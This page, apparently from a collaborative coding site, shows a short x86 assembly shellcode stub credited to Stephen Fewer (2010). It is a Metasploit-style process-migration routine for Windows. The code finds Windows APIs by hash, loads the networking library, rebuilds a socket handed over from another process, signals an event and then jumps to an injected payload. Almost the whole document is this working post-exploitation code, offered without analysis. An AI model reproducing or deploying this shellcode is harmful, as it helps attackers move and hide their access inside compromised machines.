Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
;-----------------------------------------------------------------------------;
2
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
3
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
4
; Architecture: x86
5
; Version: 1.0 (Jan 2010)
6
; Size: 219 bytes
7
; Build: >build.py migrate
8
;-----------------------------------------------------------------------------;
9

10
; typedef struct MigrateContext
11
; {
12
; 	union
13
; 	{
14
; 		HANDLE hEvent;
15
; 		BYTE bPadding1[8];
16
; 	} e;
17
; 	union
18
; 	{
19
; 		LPVOID lpPayload;
20
; 		BYTE bPadding2[8];
21
; 	} p;
22
; 	WSAPROTOCOL_INFO info;
23
; } MIGRATECONTEXT, * LPMIGRATECONTEXT;
24

25
[BITS 32]
26
[ORG 0]
27

28
  cld                    ; Clear the direction flag.
29
  mov esi, [esp+4]       ; ESI is a pointer to our migration stub context
30
  sub esp, 0x2000        ; Alloc some space on stack
31
  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
32
delta:                   ;
33
%include "./src/block/block_api.asm" ;
34
start:                   ;
35
  pop ebp                ; Pop off the address of 'api_call' for calling later.
36
  
37
  push 0x00003233        ; Push the bytes 'ws2_32',0,0 onto the stack.
38
  push 0x5F327377        ; ...
39
  push esp               ; Push a pointer to the "ws2_32" string on the stack.
40
  push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
41
  call ebp               ; LoadLibraryA( "ws2_32" )
42
  
43
  mov eax, 0x0190        ; EAX = sizeof( struct WSAData )
44
  sub esp, eax           ; alloc some space for the WSAData structure
45
  push esp               ; push a pointer to this stuct
46
  push eax               ; push the wVersionRequested parameter
47
  push 0x006B8029        ; hash( "ws2_32.dll", "WSAStartup" )
48
  call ebp               ; WSAStartup( 0x0190, &WSAData );
49
  
50
  push eax               ; If we succeed, eax wil be zero, push zero for the flags param.
51
  push eax               ; Push null for reserved parameter
52
  lea ebx, [esi+16]      ; 
53
  push ebx               ; We specify the WSAPROTOCOL_INFO structure from the MigrateContext
54
  push eax               ; We do not specify a protocol
55
  inc eax                ;
56
  push eax               ; Push SOCK_STREAM
57
  inc eax                ;
58
  push eax               ; Push AF_INET
59
  push 0xE0DF0FEA        ; hash( "ws2_32.dll", "WSASocketA" )
60
  call ebp               ; WSASocketA( AF_INET, SOCK_STREAM, 0, &info, 0, 0 );
61
  xchg edi, eax          ; Save the socket for later, we don't care about the value of eax after this
62
  
63
  push dword [esi]       ; Push the event
64
  push 0x35269F1D        ; hash( "kernel32.dll", "SetEvent" )
65
  call ebp               ; SetEvent( hEvent );
66
  
67
  call dword [esi+8]     ; Call the payload...
68

69